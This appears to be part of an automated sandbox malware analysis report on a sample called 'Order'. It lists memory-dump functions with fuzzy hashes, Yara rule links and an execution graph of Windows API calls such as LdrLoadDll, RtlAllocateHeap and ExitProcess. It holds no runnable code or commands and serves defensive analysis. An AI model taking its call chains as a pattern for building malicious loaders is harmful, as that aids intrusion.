                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b0baefa7402dbaee4c89539907320a2fdfddeff2f67c511239176aac8f519a7a
                                                                                                                                    • Instruction ID: fc2583180a1f075e6b90a27914f65df16cedfcf8e4a0d146080a6ef3ea8297c8
                                                                                                                                    • Opcode Fuzzy Hash: b0baefa7402dbaee4c89539907320a2fdfddeff2f67c511239176aac8f519a7a
                                                                                                                                    • Instruction Fuzzy Hash: 6021C279604204EFDB05DF14D9C4F26BBA5FB84314F24C6BDE9494F296C336D846CA61
                                                                                                                                    Function 00BCD006 Relevance: .1, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8e517950672f950348ed78f34663b5b562a896c884bfa74ab9d2204fd5b54191
                                                                                                                                    • Instruction ID: 0a70eb481d9c5fede5a408c845d429afad0ed33c3c546964da2aad299f2548a9
                                                                                                                                    • Opcode Fuzzy Hash: 8e517950672f950348ed78f34663b5b562a896c884bfa74ab9d2204fd5b54191
                                                                                                                                    • Instruction Fuzzy Hash: 6521A4795093808FCB12CF24D594B15BFB1EB45314F28C5EED8498B697C33A980ACB62
                                                                                                                                    Function 00BBD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction ID: d2c74870ce2813ff94bbfea8f1777ad0db8d64a4f1ed8cf2bfdf797882e0cb07
                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction Fuzzy Hash: C4110372504240CFCB02CF00D5C4B66BFB1FB94324F24C6A9D8090B356C37AE85ACBA2
                                                                                                                                    Function 00BCD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736033495.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bcd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction ID: 97db473e314b700b86696e84024d815658e6e16cdaee8845987cd93f5fe340d2
                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction Fuzzy Hash: E0118B7A604280DFDB16CF14D9C4B15BBA1FB84314F24C6AED8494F696C33AD84ACB61
                                                                                                                                    Function 00BBD745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6cd3bfaf328a8e44f60902e68f5d2f7c76212fb62a617a9b1fb501906941be86
                                                                                                                                    • Instruction ID: 1b781c3de7da007807f3f2c1482630d15cf55627c126afb8ffcbb47e59e9764d
                                                                                                                                    • Opcode Fuzzy Hash: 6cd3bfaf328a8e44f60902e68f5d2f7c76212fb62a617a9b1fb501906941be86
                                                                                                                                    • Instruction Fuzzy Hash: 1D0184711083409BE7109A27CDC4BF7BFD8DF51324F18C5AAED095A286EABD9C40CA71
                                                                                                                                    Function 00BBD744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1735991872.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_bbd000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cfd6e5e4f8f0a7e93fde97764fee2cfb7d131a61a6db27c2e24e57def16796e3
                                                                                                                                    • Instruction ID: 6d8639c9b4db1e85b9d1f91c5d5d27abc62e691f487e35982dfa4fd5e31190d7
                                                                                                                                    • Opcode Fuzzy Hash: cfd6e5e4f8f0a7e93fde97764fee2cfb7d131a61a6db27c2e24e57def16796e3
                                                                                                                                    • Instruction Fuzzy Hash: 6DF062714043449BE7108F16CC88BA6FFE8EB91734F18C59AED085B286D6799C44CAB1

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 055A7492 Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TJcq$Te^q$xbaq
                                                                                                                                    • API String ID: 0-3225726259
                                                                                                                                    • Opcode ID: c3878a52f962b2982eacc7605e70f999627979a5dc0c74599203909858e37205
                                                                                                                                    • Instruction ID: dbd14145362ba16e2396a9b72db13f99001fef07e505bcc0c6a28cf7712c406e
                                                                                                                                    • Opcode Fuzzy Hash: c3878a52f962b2982eacc7605e70f999627979a5dc0c74599203909858e37205
                                                                                                                                    • Instruction Fuzzy Hash: 30B19175E006588FDB58DF6AD9446DDBBF2BF88301F14C0AAD809AB364DB345E858F50
                                                                                                                                    Function 055A7160 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: 7512135627ffa8ea5823bdffee6ba42163d81e1d0cb75d18b317fcfe1f51f73f
                                                                                                                                    • Instruction ID: 755001e3b3179a9e51a435ece9922205c2beddd91c64f4b2308cc250e19d06c5
                                                                                                                                    • Opcode Fuzzy Hash: 7512135627ffa8ea5823bdffee6ba42163d81e1d0cb75d18b317fcfe1f51f73f
                                                                                                                                    • Instruction Fuzzy Hash: ED61FE70E00209CFD748EF7BE89069EBBF2FF88301F14C569E1159B269EB7569468B50
                                                                                                                                    Function 055A7170 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1757516014.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_55a0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q
                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                    • Opcode ID: fc74ea3a1b65f461fa74c8bd0220b4bf02000e195511c13d6c2036402cbddf0d
                                                                                                                                    • Instruction ID: c7255f2a0370e3f98a8375175a06a66554c67c38e45b1843352e7451670f39bb
                                                                                                                                    • Opcode Fuzzy Hash: fc74ea3a1b65f461fa74c8bd0220b4bf02000e195511c13d6c2036402cbddf0d
                                                                                                                                    • Instruction Fuzzy Hash: 7661EE70E00209CFD748DF7BE99069EBBF2FF88301F14C569E1159B268EB7569468B50
                                                                                                                                    Function 07AC1D07 Relevance: .3, Instructions: 329COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d32a368ba227bbb84b2baa5652610907d6bb60961230d5530fd6401c1599b095
                                                                                                                                    • Instruction ID: 0bebad4deb87863aeb99c3d0a66573c5b2d4428c73347954420c8ffa0a9b311a
                                                                                                                                    • Opcode Fuzzy Hash: d32a368ba227bbb84b2baa5652610907d6bb60961230d5530fd6401c1599b095
                                                                                                                                    • Instruction Fuzzy Hash: 18E11BB4E001199FCB14DFA9C5809AEFBF2FF89304F249169E414AB356D735A942CFA1
                                                                                                                                    Function 07AC37F8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d65212b3cf395d75d28ca588b89d3aebe3be1f65fcf013543ff4f12075b6c6c7
                                                                                                                                    • Instruction ID: a5fcd09495b24e0cb4fb018846228dc4362aab509ef953bce90a51c284128e9d
                                                                                                                                    • Opcode Fuzzy Hash: d65212b3cf395d75d28ca588b89d3aebe3be1f65fcf013543ff4f12075b6c6c7
                                                                                                                                    • Instruction Fuzzy Hash: 77E1F6B4E001199FCB14DFA9C5809AEFBB2FF89304F24D169E414AB356D731A942CFA1
                                                                                                                                    Function 07AC2150 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 734f41c8aee1f8da71b64330f782ac7e6fa5afa8f6c4a149bc3fa37d38a96122
                                                                                                                                    • Instruction ID: a41e3ad7835cd8afbc3fb4b77c7406e91ea098d615c561dfe7d6c13099d23459
                                                                                                                                    • Opcode Fuzzy Hash: 734f41c8aee1f8da71b64330f782ac7e6fa5afa8f6c4a149bc3fa37d38a96122
                                                                                                                                    • Instruction Fuzzy Hash: A7E10CB4E002199FCB14DF99C580AAEFBF2FF89304F249169E414AB356D735A942CF61
                                                                                                                                    Function 07AC18E0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ccf8531622d5be19ef84818f376cf0643c4597a926682a5a2b042af4293e48a0
                                                                                                                                    • Instruction ID: 6fa3b37728da716aa4be3e85ef2b7bdc9aefc2c8249b312238244a89041fd154
                                                                                                                                    • Opcode Fuzzy Hash: ccf8531622d5be19ef84818f376cf0643c4597a926682a5a2b042af4293e48a0
                                                                                                                                    • Instruction Fuzzy Hash: 89E1F9B4E001199FCB14DFA9C5809AEFBF2FF89304F249169E415AB356D735A942CFA0
                                                                                                                                    Function 07AC40D0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da8135d8fef73b7c6e025886a9cb57f3c1446430a9a19a27ad986646a4b2fd6c
                                                                                                                                    • Instruction ID: cd48262952b793dc5265ab92d9b10397b9be7361b40aca4a0b655698aacb6e55
                                                                                                                                    • Opcode Fuzzy Hash: da8135d8fef73b7c6e025886a9cb57f3c1446430a9a19a27ad986646a4b2fd6c
                                                                                                                                    • Instruction Fuzzy Hash: 46E12AB4E001599FCB14DFA9C5909AEFBF2FF89304F248169E414AB35AD731A942CF64
                                                                                                                                    Function 04FE49CB Relevance: .3, Instructions: 269COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1744932996.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4fe0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f5115a8f57b5bd7a94dd1d43d858314fe02b289f2cf4b080b045da125c949952
                                                                                                                                    • Instruction ID: 5aba11c37291fd7dcdbaf67d028e9dc3bbd312d879aefeb0fc3811514f35f620
                                                                                                                                    • Opcode Fuzzy Hash: f5115a8f57b5bd7a94dd1d43d858314fe02b289f2cf4b080b045da125c949952
                                                                                                                                    • Instruction Fuzzy Hash: BDD10C31D1075A9ACB01EB64D9906EDB7B1FF95300F50C7AAE00977225EBB0BAD9CB41
                                                                                                                                    Function 04FE49E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1744932996.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_4fe0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c6d72e47251de58c207c83844071d8c4873ca9a230c72b491eeb90b747555f2a
                                                                                                                                    • Instruction ID: e5020e068a8d0b09895907ed08d0d6b133a7b774c6d4fe2c665b3be660811f54
                                                                                                                                    • Opcode Fuzzy Hash: c6d72e47251de58c207c83844071d8c4873ca9a230c72b491eeb90b747555f2a
                                                                                                                                    • Instruction Fuzzy Hash: CFD1F931D1075A9ACB01EB64D990A9DB7B1FF95300F5087AAE00977225EBB0BAC9CB41
                                                                                                                                    Function 00C1D4A4 Relevance: .3, Instructions: 264COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1736217895.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_c10000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0b32802d3e384f8c52c722b49a961bd3a0187133614f02ecc16917307f898727
                                                                                                                                    • Instruction ID: 3404b35d388339a28f06260b0f806f1ab391ec2cd4ff3c9ee90062cc4b895388
                                                                                                                                    • Opcode Fuzzy Hash: 0b32802d3e384f8c52c722b49a961bd3a0187133614f02ecc16917307f898727
                                                                                                                                    • Instruction Fuzzy Hash: 1EA15C36E00205DFCF05DFA5C8405DEB7B2FF86300B2585BAE816AB265DB71D996EB40
                                                                                                                                    Function 07AC2140 Relevance: .1, Instructions: 132COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1762035548.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7ac0000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fa7550a3d021201d49ba7c451c71bbf346909349392ac5354730c4fea7c52442
                                                                                                                                    • Instruction ID: 930cb355b1a79da6c0ee74b88e4142b61c658a70e2efa0405bea953e63ad47d8
                                                                                                                                    • Opcode Fuzzy Hash: fa7550a3d021201d49ba7c451c71bbf346909349392ac5354730c4fea7c52442
                                                                                                                                    • Instruction Fuzzy Hash: 7351FCB4E002198BDB14CFAAC5805AEFBF2FF89314F24C169D458A7356D7359A42CF61

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:1.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                                    Signature Coverage:8.1%
                                                                                                                                    Total number of Nodes:135
                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                    execution_graph 93353 428c43 93354 428ca8 93353->93354 93355 428ce3 93354->93355 93358 418d43 93354->93358 93357 428cc5 93359 418cd5 93358->93359 93362 42cc83 93359->93362 93361 418d2b 93361->93357 93363 42cc9d 93362->93363 93364 42ccae ExitProcess 93363->93364 93364->93361 93365 42fb63 93366 42fb73 93365->93366 93367 42fb79 93365->93367 93370 42ea83 93367->93370 93369 42fb9f 93373 42cbe3 93370->93373 93372 42ea9e 93372->93369 93374 42cc00 93373->93374 93375 42cc11 RtlAllocateHeap 93374->93375 93375->93372 93376 424fc3 93377 424fdc 93376->93377 93378 425027 93377->93378 93381 425063 93377->93381 93383 425068 93377->93383 93384 42e9a3 93378->93384 93382 42e9a3 RtlFreeHeap 93381->93382 93382->93383 93387 42cc33 93384->93387 93386 425033 93388 42cc50 93387->93388 93389 42cc61 RtlFreeHeap 93388->93389 93389->93386 93390 42be83 93391 42be9d 93390->93391 93394 1982df0 LdrInitializeThunk 93391->93394 93392 42bec5 93394->93392 93492 424c33 93493 424c4f 93492->93493 93494 424c77 93493->93494 93495 424c8b 93493->93495 93496 42c8b3 NtClose 93494->93496 93497 42c8b3 NtClose 93495->93497 93498 424c80 93496->93498 93499 424c94 93497->93499 93502 42eac3 RtlAllocateHeap 93499->93502 93501 424c9f 93502->93501 93503 42fc93 93504 42fc03 93503->93504 93505 42fc60 93504->93505 93506 42ea83 RtlAllocateHeap 93504->93506 93507 42fc3d 93506->93507 93508 42e9a3 RtlFreeHeap 93507->93508 93508->93505 93395 4141e3 93396 4141fc 93395->93396 93401 417983 93396->93401 93398 41421a 93399 414266 93398->93399 93400 414253 PostThreadMessageW 93398->93400 93400->93399 93402 4179a7 93401->93402 93403 4179e3 LdrLoadDll 93402->93403 93404 4179ae 93402->93404 93403->93404 93404->93398 93509 413c73 93512 42cb43 93509->93512 93513 42cb5d 93512->93513 93516 1982c70 LdrInitializeThunk 93513->93516 93514 413c95 93516->93514 93517 41b4f3 93518 41b537 93517->93518 93519 42c8b3 NtClose 93518->93519 93520 41b558 93518->93520 93519->93520 93405 401be3 93406 401b78 93405->93406 93407 401be9 93405->93407 93410 430033 93406->93410 93413 42e553 93410->93413 93414 42e579 93413->93414 93425 407523 93414->93425 93416 42e58f 93417 401bda 93416->93417 93428 41b303 93416->93428 93419 42e5ae 93420 42e5c3 93419->93420 93421 42cc83 ExitProcess 93419->93421 93439 428553 93420->93439 93421->93420 93423 42e5dd 93424 42cc83 ExitProcess 93423->93424 93424->93417 93443 416643 93425->93443 93427 407530 93427->93416 93429 41b32f 93428->93429 93461 41b1f3 93429->93461 93432 41b374 93434 41b390 93432->93434 93437 42c8b3 NtClose 93432->93437 93433 41b35c 93435 41b367 93433->93435 93467 42c8b3 93433->93467 93434->93419 93435->93419 93438 41b386 93437->93438 93438->93419 93441 4285b5 93439->93441 93440 4285c2 93440->93423 93441->93440 93475 4187f3 93441->93475 93444 416660 93443->93444 93446 416679 93444->93446 93447 42d313 93444->93447 93446->93427 93448 42d32d 93447->93448 93449 42d35c 93448->93449 93454 42bed3 93448->93454 93449->93446 93452 42e9a3 RtlFreeHeap 93453 42d3d5 93452->93453 93453->93446 93455 42bef0 93454->93455 93458 1982c0a 93455->93458 93456 42bf1c 93456->93452 93459 1982c1f LdrInitializeThunk 93458->93459 93460 1982c11 93458->93460 93459->93456 93460->93456 93462 41b20d 93461->93462 93466 41b2e9 93461->93466 93470 42bf73 93462->93470 93465 42c8b3 NtClose 93465->93466 93466->93432 93466->93433 93468 42c8cd 93467->93468 93469 42c8de NtClose 93468->93469 93469->93435 93471 42bf90 93470->93471 93474 19835c0 LdrInitializeThunk 93471->93474 93472 41b2dd 93472->93465 93474->93472 93476 41881d 93475->93476 93482 418d2b 93476->93482 93483 413e53 93476->93483 93478 41894a 93479 42e9a3 RtlFreeHeap 93478->93479 93478->93482 93480 418962 93479->93480 93481 42cc83 ExitProcess 93480->93481 93480->93482 93481->93482 93482->93440 93484 413e73 93483->93484 93486 413edc 93484->93486 93488 41b613 RtlFreeHeap LdrInitializeThunk 93484->93488 93486->93478 93487 413ed2 93487->93478 93488->93487 93521 1982b60 LdrInitializeThunk 93489 418f48 93490 42c8b3 NtClose 93489->93490 93491 418f52 93490->93491

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00417983 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 65 417983-41799f 66 4179a7-4179ac 65->66 67 4179a2 call 42f6a3 65->67 68 4179b2-4179c0 call 42fca3 66->68 69 4179ae-4179b1 66->69 67->66 72 4179d0-4179e1 call 42e023 68->72 73 4179c2-4179cd call 42ff43 68->73 78 4179e3-4179f7 LdrLoadDll 72->78 79 4179fa-4179fd 72->79 73->72 78->79
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                    • Instruction ID: c7a968f45a459e0633ba3b3c9d85e8edd550cd31cb490a104a89d8a481d041c1
                                                                                                                                    • Opcode Fuzzy Hash: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                    • Instruction Fuzzy Hash: BA0152B5E0010DA7DB10DAA5DC42FDEB3789B14308F4041A6E90897240F635EB588B95
                                                                                                                                    Function 0042C8B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 90 42c8b3-42c8ec call 404843 call 42db13 NtClose
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_Order.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction ID: d5d408aa627ccc7809f1817482fdcd7888bd1ae54e0b5777c1bc992e71757020
                                                                                                                                    • Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                    • Instruction Fuzzy Hash: 95E04F363002147BDA20BA5ADC41FDB775CDBC9754F004419FB0DA7282D670BA0086E5
                                                                                                                                    Function 01982B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 104 1982b60-1982b6c LdrInitializeThunk
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
                                                                                                                                    • Instruction ID: afa99401afe53eef8c3d5ae555dc654668b1ce990bd3b89390feeba8c3b4adc4
                                                                                                                                    • Opcode Fuzzy Hash: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
                                                                                                                                    • Instruction Fuzzy Hash: 31900261203504034605715C4418616804E97E1201B55C025E1058590DC52A89916229
                                                                                                                                    Function 01982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 106 1982df0-1982dfc LdrInitializeThunk
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
                                                                                                                                    • Instruction ID: 5e94db89906ec16af423fb82357e47a7ea0950bec20c1afcf252967b32f43ebe
                                                                                                                                    • Opcode Fuzzy Hash: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
                                                                                                                                    • Instruction Fuzzy Hash: 8390023120250813D611715C4508707404D97D1241F95C416A0468558DD65B8A52A225
                                                                                                                                    Function 01982C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 105 1982c70-1982c7c LdrInitializeThunk
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
